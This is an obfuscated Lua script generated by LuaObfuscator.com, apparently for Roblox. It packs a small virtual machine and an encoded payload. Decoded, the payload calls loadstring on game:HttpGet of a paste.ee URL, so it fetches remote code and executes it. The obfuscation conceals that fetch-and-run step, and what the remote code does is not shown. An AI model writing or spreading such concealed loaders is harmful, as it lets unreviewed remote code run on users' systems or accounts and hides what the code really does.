--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v30,16));if v19 then local v122=v5(v90,v19);v19=nil;return v122;else return v90;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v91=0 + 0 ;local v92;while true do if (v91==(0 -0)) then v92=(v31/(((962 -(892 + 65)) -(7 -4))^(v32-(878 -(282 + 595)))))%((3 -1)^(((v33-(2 -1)) -(v32-(1 + (0 -0)))) + (620 -(555 + 64)))) ;return v92-(v92%(1066 -(68 + 997))) ;end end else local v93=0;local v94;while true do if (v93==(931 -(857 + 74))) then v94=(8 -(10 -4))^(v32-(569 -(367 + 201))) ;return (((v31%(v94 + v94))>=v94) and (928 -(214 + (1063 -(87 + 263))))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(953 -(802 + 150))) then return (v37 * (436 -((1064 -(915 + 82)) + 113))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + 2 + (0 -0) );v18=v18 + (4 -2) ;v35=1 + 0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 2 + 1 );v18=v18 + ((1 + 3) -0) ;return (v41 * (16778403 -(1069 + 118))) + (v40 * (148681 -(147732 -64587))) + (v39 * (559 -303)) + v38 ;end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==((2608 -(1703 + 114)) -((1069 -(376 + 325)) + (693 -270)))) then v43=v23();v44=v23();v42=3 -2 ;end if (v42==(21 -(10 + 8))) then if (v47==(0 -0)) then if (v46==(442 -(416 + (79 -53)))) then return v48 * (0 -(0 + 0)) ;else local v123=0 + 0 ;while true do if (v123==(0 -0)) then v47=1 -0 ;v45=438 -(145 + 293) ;break;end end end elseif (v47==(7047 -5000)) then return ((v46==(430 -(44 + 386))) and (v48 * ((1487 -(998 + 488))/0))) or (v48 * NaN) ;end return v8(v48,v47-(325 + 698) ) * (v45 + (v46/((2 + 0)^(824 -(201 + 571))))) ;end if (v42==((10 -5) -3)) then v47=v20(v44,1159 -(116 + 1022) ,1 + (44 -(9 + 5)) );v48=((v20(v44,133 -101 )==(1 + 0)) and  -(1 + 0)) or (3 -2) ;v42=10 -7 ;end if (v42==(1 + 0)) then v45=(1236 -(85 + 291)) -(814 + 45) ;v46=(v20(v44,2 -1 ,2 + 18 ) * ((1 + 1)^(1297 -(243 + 1022)))) + v43 ;v42=5 -3 ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(1 -0)) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=2 + 0 ;end if ((1183 -(1123 + 57))==v50) then return v6(v52);end if (v50==(0 + 0)) then v51=nil;if  not v49 then local v119=0 + 0 ;while true do if (v119==0) then v49=v23();if (v49==(254 -(163 + (529 -(262 + 176))))) then return "";end break;end end end v50=1931 -(1869 + 61) ;end if (v50==(1852 -(1409 + 441))) then v52={};for v113=(1722 -(345 + 1376)) + 0 , #v51 do v52[v113]=v2(v1(v3(v51,v113,v113)));end v50=(698 -(198 + 490)) -7 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0 + 0 ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do local v112=(function() return 0;end)();while true do if (v112~=0) then else if ((1 + 0)==v104) then local v125=(function() return 0 + 0 ;end)();while true do if ((1769 -(1749 + 20))~=v125) then else while true do if (0~=v95) then else v96=(function() return v97();end)();if (v98(v96, #"}", #"{")~=(0 -0)) then else local v172=(function() return 341 -(218 + 123) ;end)();local v173=(function() return;end)();local v174=(function() return;end)();local v175=(function() return;end)();while true do if (v172==(1 + 2)) then if (v98(v174, #"xxx", #"91(")== #"[") then v175[ #"0836"]=(function() return v101[v175[ #"0836"]];end)();end v102[v103]=(function() return v175;end)();break;end if (v172~=(1581 -(1535 + 46))) then else local v179=(function() return 0;end)();while true do if (v179==(1323 -(1249 + 73))) then v172=(function() return 1 + 0 ;end)();break;end if (v179~=0) then else local v184=(function() return 0 + 0 ;end)();while true do if (v184==(1 + 0)) then v179=(function() return 561 -(306 + 254) ;end)();break;end if (v184==(1145 -(466 + 679))) then v173=(function() return v98(v96,4 -2 , #"gha");end)();v174=(function() return v98(v96, #"0836",1 + 5 );end)();v184=(function() return 2 -1 ;end)();end end end end end if (v172==(3 -1)) then if (v98(v174, #"!", #"\\")== #"{") then v175[1469 -(899 + 568) ]=(function() return v101[v175[2]];end)();end if (v98(v174,2 + 0 ,2)~= #"<") then else v175[ #"19("]=(function() return v101[v175[ #"91("]];end)();end v172=(function() return 3;end)();end if (v172==1) then local v180=(function() return 0 -0 ;end)();while true do if (v180==(0 -0)) then v175=(function() return {v99(),v99(),nil,nil};end)();if (v173==(603 -(268 + 335))) then local v185=(function() return 290 -(60 + 230) ;end)();local v186=(function() return;end)();while true do if ((584 -(57 + 527))==v185) then v186=(function() return 572 -(426 + 146) ;end)();while true do if ((0 + 0)~=v186) then else v175[ #"91("]=(function() return v99();end)();v175[ #".com"]=(function() return v99();end)();break;end end break;end end elseif (v173== #"\\") then v175[ #"xnx"]=(function() return v100();end)();elseif (v173==(1458 -(282 + 1174))) then v175[ #"-19"]=(function() return v100() -((813 -(569 + 242))^(35 -19)) ;end)();elseif (v173== #"gha") then local v191=(function() return 0 -0 ;end)();local v192=(function() return;end)();while true do if ((0 -0)==v191) then v192=(function() return 166 -(122 + 44) ;end)();while true do if (v192==(0 + 0)) then v175[ #"nil"]=(function() return v100() -(2^(27 -11)) ;end)();v175[ #"?id="]=(function() return v99();end)();break;end end break;end end end v180=(function() return 3 -2 ;end)();end if (v180~=1) then else v172=(function() return 2;end)();break;end end end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end if (v104==0) then v95=(function() return 1024 -(706 + 318) ;end)();v96=(function() return nil;end)();v104=(function() return 1252 -(721 + 530) ;end)();end break;end end end end;end)();local v54=(function() return function(v105,v106,v107) local v108=(function() return 1271 -(945 + 326) ;end)();local v109=(function() return;end)();while true do if (v108==(65 -(30 + 35))) then v109=(function() return 0 -0 ;end)();while true do if (v109~=(0 + 0)) then else local v126=(function() return 0 + 0 ;end)();local v127=(function() return;end)();while true do if (v126==(700 -(271 + 429))) then v127=(function() return 0 + 0 ;end)();while true do if (v127~=(0 -0)) then else v105[v106-#"[" ]=(function() return v107();end)();return v105,v106,v107;end end break;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"~",v59 do local v69=(function() return 1500 -(1408 + 92) ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==(1086 -(461 + 625))) then v70=(function() return 1288 -(993 + 295) ;end)();v71=(function() return nil;end)();v69=(function() return 1 + 0 ;end)();end if ((1172 -(418 + 753))==v69) then v72=(function() return nil;end)();while true do if (v70~=(1 + 0)) then else if (v71== #"]") then v72=(function() return v21()~=(320 -(53 + 267)) ;end)();elseif (v71==(1 + 1)) then v72=(function() return v24();end)();elseif (v71~= #"19(") then else v72=(function() return v25();end)();end v60[v68]=(function() return v72;end)();break;end if ((413 -(15 + 398))~=v70) then else v71=(function() return v21();end)();v72=(function() return nil;end)();v70=(function() return 1;end)();end end break;end end end v58[ #"xxx"]=(function() return v21();end)();for v73= #"|",v23() do FlatIdent_7FAC9,Descriptor,v21,v20,v22,v23,v60,v55,v73=(function() return v53(FlatIdent_7FAC9,Descriptor,v21,v20,v22,v23,v60,v55,v73);end)();end for v74= #"~",v23() do v56,v74,v28=(function() return v54(v56,v74,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1];local v66=v62[984 -(18 + 964) ];local v67=v62[3];return function(...) local v75=v65;local v76=v66;local v77=v67;local v78=v27;local v79=3 -2 ;local v80= -(1 + 0);local v81={};local v82={...};local v83=v12("#",...) -(851 -(20 + 830)) ;local v84={};local v85={};for v110=0 + 0 ,v83 do if ((v110>=v77) or (2232>2497)) then v81[v110-v77 ]=v82[v110 + 1 + 0 ];else v85[v110]=v82[v110 + ((3666 -(1121 + 569)) -(1913 + 62)) ];end end local v86=(v83-v77) + (127 -(116 + 10)) ;local v87;local v88;while true do local v111=(0 -0) + 0 ;while true do if (v111==((0 -0) -0)) then v87=v75[v79];v88=v87[739 -(542 + 196) ];v111=1 -0 ;end if ((v111==(1 + 0)) or (2110<=332)) then if (v88<=(2 + 1)) then if ((3686>3172) and (v88<=(1 + 0))) then if (v88==(0 -(0 + 0))) then v85[v87[4 -2 ]]=v87[1554 -((1340 -(22 + 192)) + 425) ];else local v130;local v131,v132;local v133;local v134;v85[v87[2 -0 ]]={};v79=v79 + ((1112 -706) -(118 + 287)) ;v87=v75[v79];v85[v87[306 -(244 + 43 + 17) ]]=v64[v87[3]];v79=v79 + (3 -2) ;v87=v75[v79];v85[v87[1123 -(118 + 1003) ]]=v64[v87[8 -(688 -(483 + 200)) ]];v79=v79 + (378 -(74 + 68 + 235)) ;v87=v75[v79];v134=v87[2 + 0 ];v133=v85[v87[(1476 -(1404 + 59)) -(27 -17) ]];v85[v134 + 1 + (0 -0) ]=v133;v85[v134]=v133[v87[981 -(553 + 424) ]];v79=v79 + ((2272 -658) -(1565 + (813 -(468 + 297)))) ;v87=v75[v79];v85[v87[(565 -(334 + 228)) -1 ]]=v87[3 + 0 ];v79=v79 + (268 -(176 + 91)) ;v87=v75[v79];v134=v87[2];v131,v132=v78(v85[v134](v13(v85,v134 + (2 -(1 + 0)) ,v87[3 + 0 ])));v80=(v132 + v134) -(1 + 0) ;v130=0;for v161=v134,v80 do v130=v130 + (1 -(163 -(92 + 71))) ;v85[v161]=v131[v130];end v79=v79 + (1093 -((3288 -2313) + 117)) ;v87=v75[v79];v134=v87[1 + 1 ];v85[v134]=v85[v134](v13(v85,v134 + 1 + 0 ,v80));v79=v79 + (2 -1) ;v87=v75[v79];v85[v87[2 + 0 ]]();v79=v79 + (2 -1) ;v87=v75[v79];do return;end end elseif (v88==((8 -4) -2)) then local v150=v87[1 + 1 ];local v151=v85[v87[14 -11 ]];v85[v150 + ((1366 -612) -(239 + (863 -349))) ]=v151;v85[v150]=v151[v87[2 + 2 ]];else v85[v87[1331 -(797 + 532) ]]={};end elseif (v88<=(4 + 1)) then if (v88==4) then v85[v87[(1 + 2) -1 ]]();else do return;end end elseif ((v88<=(15 -9)) or (4474<820)) then local v156=0 + 0 ;local v157;local v158;local v159;local v160;while true do if (v156==(2 -1)) then v80=(v159 + v157) -(1203 -(373 + 829)) ;v160=(1425 -(141 + 95)) -(449 + 740) ;v156=733 -(476 + 255) ;end if ((4279>=2882) and (v156==(949 -(245 + 702)))) then for v170=v157,v80 do local v171=1130 -(369 + 761) ;while true do if (v171==(0 + 0)) then v160=v160 + 1 + 0 ;v85[v170]=v158[v160];break;end end end break;end if ((v156==(0 + 0)) or (2029>=3521)) then v157=v87[2 -0 ];v158,v159=v78(v85[v157](v13(v85,v157 + (441 -(382 + (823 -(574 + 191)))) ,v87[5 -2 ])));v156=239 -(53 + 11 + 174) ;end end elseif (v88>(1 + 6)) then local v164=v87[2 -0 ];v85[v164]=v85[v164](v13(v85,v164 + (337 -(144 + 192)) ,v80));else v85[v87[218 -(42 + 174) ]]=v64[v87[3 + 0 ]];end v79=v79 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031B3Q00682Q7470733A2Q2F70617374652E2Q652F722F6567564C335A6F4400094Q00017Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
